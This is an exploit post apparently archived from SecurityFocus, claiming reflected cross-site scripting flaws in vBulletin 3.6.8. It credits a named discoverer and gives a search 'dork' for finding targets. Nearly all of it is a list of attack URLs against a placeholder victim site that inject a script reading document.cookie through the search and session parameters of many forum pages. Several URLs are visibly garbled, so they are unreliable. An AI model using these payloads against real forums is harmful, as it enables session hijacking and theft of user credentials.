vBulletin V3.6.8 XSS Password Md5 Hash Aug 17 2007 10:56AM
RaeD BsdMail Com
#Discovered By : Hasadya Raed
----------------
#Contact : RaeD (at) BsdMail (dot) Cpm [email concealed]
----------------
#Script: vBulletin V3.6.8
----------------
#Dork: vBulletin V3.6.8
----------------
#Exploit :

http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=1

http://www.Victim.com/vBulletin V3.6.8/index.php?s=<script>alert('document.cookie')</script>

http://www.Victim.com/vBulletin V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=2"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

Copyright 2010, SecurityFocus